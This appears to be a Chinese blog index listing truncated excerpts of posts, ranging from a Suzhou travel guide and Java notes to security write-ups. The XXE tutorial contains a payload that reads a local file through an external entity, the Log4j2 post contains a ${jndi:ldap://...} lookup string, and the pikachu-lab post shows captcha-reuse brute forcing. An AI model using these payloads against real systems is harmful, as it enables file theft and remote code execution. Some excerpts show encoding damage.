我直接就是水一篇文章出来，顺便也给大家出一篇攻略吧 day1傍晚到的苏州 苏州站下车就是护城河，可以绕着护城河走一走，我就是这么干的，因为订的酒店也离苏州站没有那么远， 对于我来说很好看 散散步很舒服夜景很美。酒店在拙政园和苏州博物馆附近，走过去就几分钟路程，也没有那么贵，正常酒店价格；三天345元，可以直接地图搜都市118连锁酒店（观前街拙政园店） 附上几张护城河的照片，个人觉得很美 从苏州站直接走去了山塘街，大概30分钟路程吧；山塘街夜景也很美 散散步很舒服 就是人太多了，建筑就是典型的江南水乡的风景，其实正常来说就是个小吃街而已。吃的看自己叭，因为我是自己一个人，也没有吃那么多。不建议在山塘街吃东西（外地人最好骗），附上山塘街照片 day2拙政园和苏博以及狮子林需要前一天提前买票和预约，尤其是你要周末去玩（人很多，有可能晚预约就没票了）更要提前做打算，还有这些公正号都是运营时间是8:00——21:00 要早点把这些事情干了 第一站拙政园，典型的园林，个人觉得值得一去(虽然我同学不太喜欢)，但是本着来都来了，看看呗，总体来说还是不错的，拍拍照散散步很好，也挺出片的。来一躺不看看怪可惜的，就是我去的时候好多地方在建，所以有点可惜。 然后去了苏州博物馆，我只能说绝对是我去过最漂亮的博物馆藏品也挺丰富的，很出片，你会发现很多姐姐在哪里拍照，真的很美，尤其是博物馆的整体建筑设计，非常之漂亮，藏品也很漂亮。 然后下一站去了狮子林，也是一个园林，个人感觉一般，有可能是我去了太多园林审美疲劳了，想去的可以去看看，四A级景区，狮子林最出名的是假山，确实假山很多而且四通八达。 因为感觉饭点人真的太多了，所以我在下午三点去吃了我同学推荐的蟹黄捞面。虽然很贵但是我感觉蛮好吃，美团买69，店买98.建议大家可以吃吃看尤其是吃螃蟹的季节，店就在拙政园附近。地图直接搜山塘老街·蟹黄专 ...

关于XXE漏洞大家相比都不陌生，虽包含在OWASP top10，算是比较常见的漏洞，但是在实战情况下较少遇到，之前文章中虽然也涉及到过XXE的漏洞复现，但是并未太过涉及该漏洞，正好之前有篇文章，修改了一下就发出来了 XXE、XML关于xxe是什么，那就不得不提xml了，简单来说xml就是一种语言，我们在创建java项目的时候通常用xml来引入依赖，xml与html不同，xml旨在传输信息，焦点是数据的格式。 xxe漏洞原因是在解析xml输入时，没有禁止外部实体的加载，导致加载恶意外部文件，而产生的危害，例如rce、任意文件read、内网探测等等，一般是结合其他漏洞打组合拳 XXE检测关于XXE的检测，工具去扫应该是最简单的方法了，所以就不介绍，只介绍一下手工的方法 数据格式首选可以看数据包的格式，例如 <user><username>1</username><password>1</password></user> 这种就是典型的xml格式的数据包，说明是支持xml的数据传输格式，可以进一步去检测是否有XXE漏洞 Content-Type值判断Content-Type: application/xml;即证明支持xml数据传输格式，可以进一步检测XXE漏洞 就借助这个案例来用一下这个靶场，靶场源码就不看了，支持XML数据传输格式，然后再去写一下我们的payload去跑一下 <?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///d://1.txt"> ...

本篇文章写于2022年12月Java实训之后，对于jdbc技术有了一点点了解，故有了这篇文章；重点介绍java代码实现 jdbc是什么JDBC是一种可用于执行SQL语句的JavaAPI（ApplicationProgrammingInterface应用程序设计接口）。它由一些Java语言编写的类和界面组成。JDBC为数据库应用开发人员、数据库前台工具开发人员提供了一种标准的应用程序设计接口，使开发人员可以用纯Java语言编写完整的数据库 这里的数据库指的是市面上流行的数据库。如MySQL、Oracle、SQL server等数据库。 jdbc主要能完成的任务简单地说，JDBC能完成下列三件事： 1）同一个数据库建立连接； 2）向数据库发送SQL语句； 3）处理数据库返回的结果 本片文章的环境java版本：jdk1.8.0_221 数据库：MySQL 5.7.26 编译器：IntelliJ IDEA 2021.2.3 代码实现手动调用Class.forName()先来看实现数据库连接的代码 Class.forName("com.mysql.jdbc.Driver");//加载MySQL连接驱动 加载驱动，我们进到driver类中看一下，这个类长下面这样 public class Driver extends NonRegisteringDriver implements java.sql.Driver { public Driver() throws SQLException { } static { try { DriverManager.registerDriver(new Driver()); } catch (SQLExcep ...

关于漏洞复现，请看上篇文章 漏洞代码就用上篇文章的代码 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class main { private static final Logger logger = LogManager.getLogger(); public static void main(String[] args) { System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true"); logger.error("${jndi:ldap://127.0.0.1:1389/Calc}"); } } 漏洞入口代码打上断点进行分析，也就是looger.error这一行，一些不重要的地方我就省略一下了，漏洞入口再error函数，我们跟进一下，这里可以看到error函数进入到logIFabled中，入口在logIFEnabled() lookup机制lookup机制，通俗点说控制会在什么地方级别的日志中出现。首先我们要了解一点日志等级，在log4j2中， 共有8个级别，按照从低到高为：ALL < TRACE < DEBUG < INFO < WARN < ERROR < FATAL < OFF All:最低等级的，用于打开所有日志记录. Trace:是追踪，就是程序推进一下. Debug:指出细粒度信息事件对调试应用程序是非常有帮助的. Info:消息在粗粒度级 ...

log4j2这个漏洞相比大家不陌生了，是在2021年11月爆出来的apache log4j2的漏洞，下面会详细介绍，堪称漏洞界的核武器了，当时刚爆出来的时候其实就有所耳闻，但是当时并未接触java安全，时隔一年再翻出来看看也是颇有感受的，也算相较于去年进步了吧 这篇文章字有点多，好多概念以及需要了解的东西 漏洞相关信息背景Apache Log4j2是一个基于Java的日志记录工具，是一个很流行的日志记录工具，这才导致这个漏洞影响之大之广，轰动世界，说是核武器当然不为过 2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。 漏洞编号CNVD-2021-95919，CVE-2021-44228 利用条件利用条件可谓是十分简单了，只要你的组件中引入了log4j-api , log4j-core 两个jar，那么这个漏洞就可以被攻击者利用，像测试XSS那样进行RCE 漏洞影响版本Apache Log4j 2.x<=2.14.1 本文环境为log4j2 2.141版本 漏洞利用相关知识log4j2远程代码执行漏洞主要由于存在JNDI注入漏洞，黑客可以恶意构造特殊数据请求包，触发此漏洞，从而成功利用此漏洞可以在目标服务器上执行任意代码，那么自然而然就要知道jndi是个什么东西以及原理 JNDIJNDI全称是Java Naming and Directory Interfac ...

前言这篇文章水文一篇，起初是逛技术站看到了这样一篇文章，就好奇尝试一下，过程比较复杂，虽然并没什么用，但是对于一个年轻的小伙子对于未知东西的好奇，还是坚持找到了解决办法，大家就当图个乐吧 前期准备使用VMware安装MacOS虚拟机需要下面的三个资源 VMware Workstation：下载 VMware Workstation Pro 版本随意，推荐VMware Workstation 16 pro的环境，因为版本不同可能会出现不同的问题 MacOS的镜像，这里我提供两个10.13和10.14；链接：https://pan.baidu.com/s/1Cx9fAsyOiNtiyX2h_24eoA 提取码：kj5j 百度网盘限速下载慢的话建议看我百度网盘那篇文章 VMware Workstation默认是不支持MacOS虚拟机的安装，所以我们需要破解掉他的限制，这里用到github上的一个工具，https://github.com/paolo-projects/auto-unlocker/releases 注意下载Unlocker-v2.0.0a-x64.zip文件 下载好后解压后得到一个文件夹，里面只有一个exe文件，那就是我们需要的破解程序，注意将这个解压后的文件夹放到你的VMware workstation的安装路径下，例如下面这样 前期需要准备的东西就已经准备完成了 我这里的环境是Windows10家庭版+VMware Workstation 16 pro+MacOS10.13镜像 正文破解右键管理员方式打开我们解压后的破解文件，也就是Unlocker-v2.0.0a-x64/Unlocker.exe 这里可以看到蓝色框内已经自动识别到VMware的安装路径，这也是为什么要把这个文件放到VMware的安装路径的原因，点击Path就会自动进行破解，进度条 ...

java笔记篇：包、final关键字、常量、抽象类、接口、内部类，都是一些零碎的知识，所以写一篇记录一下，偶尔翻出来看看�? �? final 常量 权限修饰�?&&代码�? 关于静态代码块实现数据的初始化，我在前面写的学生信息管理系统中添加一个不需要注册的管理员信息来实现；改写前App.java代码 改写后App.java代码�? 那么我们运行尝试一下初始化添加的管理员信息是否有效 抽象类和抽象方法抽象类和抽象方法的定义方�? public abstract class Animal { public abstract void eat(); } //代码我就直接写在一个文件里面了，看起来方便一�? public class App { public static void main(String[] args) { Dog d = new Dog("大黄",3); d.eat(); d.drink(); Sheep s = new Sheep("小黄",2); s.eat(); s.drink(); } } abstract class Animal { String name; int age; public Animal() { } public Animal(String name, int age) { this.name = name; this.age = age; } public String ge ...

这篇文章纯粹是个人笔记，感觉不重要但是知识零碎，自己可能过几天就忘了，所以发到网站上来闲着没事自己偶尔看看，复习一�? 练习 这个程序我就不写了，相对来说简单一�? 成员方法被继承的条件 继承原则 继承访问特点0x01成员变量访问特点 就近原则：先从本类的局部位置找，然后再去本类成员位置中找，然后再到父类成员位置�? 0x02成员方法的访问特�? 同成员变量访问特点，就近原则 方法重写：当父类中的方法不满足子类的需求的时候，可以写一个跟父类中方法名一样的方法来覆盖子类中的方�? 虚方法表：非private 非static 非final修饰的方法可以加到虚方法表中 0x03构造方法的访问特点 如果想调用父类中的有参构造，必须手动书写来进行调用，例如下方例子 0x04练习 public class employs { private int number; private String name; private int money; public employs() { } public employs(int number, String name, int money) { this.number = number; this.name = name; this.money = money; } public int getNumber() { return number; } public void setNumber(int number) { this.number = number; } ...

前言偶然发现了在c盘出现了两个个好玩的文件，之前并没有对系统了解过多，也是借助这次偶然发现了跟mac一样的机制以及之前未接触到的机制 起因由于用的还是2016年的dell机子，c盘只有66g的内存，所以平时对c盘还是格外关注，今天在敲代码的时候发现前几秒还是35g，突然c盘就变成了30g，我就好奇到底是什么原因让c盘突然缩小了5个g，因为我也当时并没有往c盘安装或者存什么东西进去 经过拿everything按大小和时间都找了一遍，最后定位到一个叫pagefile.sys和一个叫hiberfil.sys的文件上，大小为6个G和3个G，最后修改时间也是2022/10/30日，也就是刚刚发生变化的时间 0x01pagefile.sys看一眼pagefile.sys属性，并没有发现什么有用的信息，但是肯定的是应该是系统生成的文件 到这里其实还是不清楚到底是什么文件，直到我把大部分正在运行的文件关闭时，我发现pagefile.sys这个文件变小了？但是hiberfil.sys并未变化 到这里我就更加奇怪了，这到底是个什么文件，我开满软件文件的时候修改并且变大，当我关闭大部分文件后，本机所用内存不多时，这个文件就变小？ 其实到这里大家应该大概能猜到了，跟本机的内存使用情况有关，但是我只听说过mac在电脑运存不足时将硬盘部分内存当作运存来临时使用，但是并未听说过Windows的类似情况 0x02hiberfil.sys看了一眼hiberfil.sys也并未发现什么有用的东西，但是这个文件并不会因为我关闭程序而变小，那么大概率跟物理内存没关系 结果最终也是百度解决了我的这个疑惑 0x01pagefile.sys Pagefile.sys 是用于管理虚拟内存的 Windows 分页（或交换）文件。它在系统物理内存 (RAM) 不足时使用 Pagefile. ...

最近在挖洞的过程中遇到了这个问题，在后台暴力破解的时候，被验证码的问题卡住了，故才有了这篇文章，来研究一下暴力破解以及后台登录界面的验证码绕过问题。 关于验证码的问题我记得之前面试的时候被问到过，但是并没有特别仔细的写，这篇文章就结合案例来写一下，菜勿喷 验证码机制原理客户端发起请求 > 服务端响应并创建一个新的SessionID同时生成随机验证码，将验证码和SessionID一并返回给客户端 > 客户端提交验证码连同SessionID给服务端 > 服务端验证验证码同时销毁当前会话，返回给客户端结果 验证码复用0x01这种情况在现在基本上不存在了，也就只有pikachu这种入门漏洞靶场有这种情况，还是写一写把 直接进到pikachu暴力破解网站http://localhost/vul/burteforce/bf_server.php 随便输入用户名密码，验证码输入，burp抓包发送到repeat模块 那么问题就出来了，我们直接修改数据包中username和password然后send看一下变化 第一次 修改后 那么问题就很明显了，两次输入的密码不同但是验证码却一样，验证码复用问题就很明显了，直接intruder模块爆破即可，我们也去源代码看看，定位到WWW\vul\burteforce\bf_server.php文件36行左右对验证码进行校验的代码 if (strtolower($_POST['vcode']) != strtolower($_SESSION['vcode'])) { $html .= "<p class='notice'>验证码输入错误哦！</p>"; //应该在验证完成后,销毁该$_SESSION['vcode'] } 在校验验证码后，并没有摧毁生成的验证码，而是并未进行 ...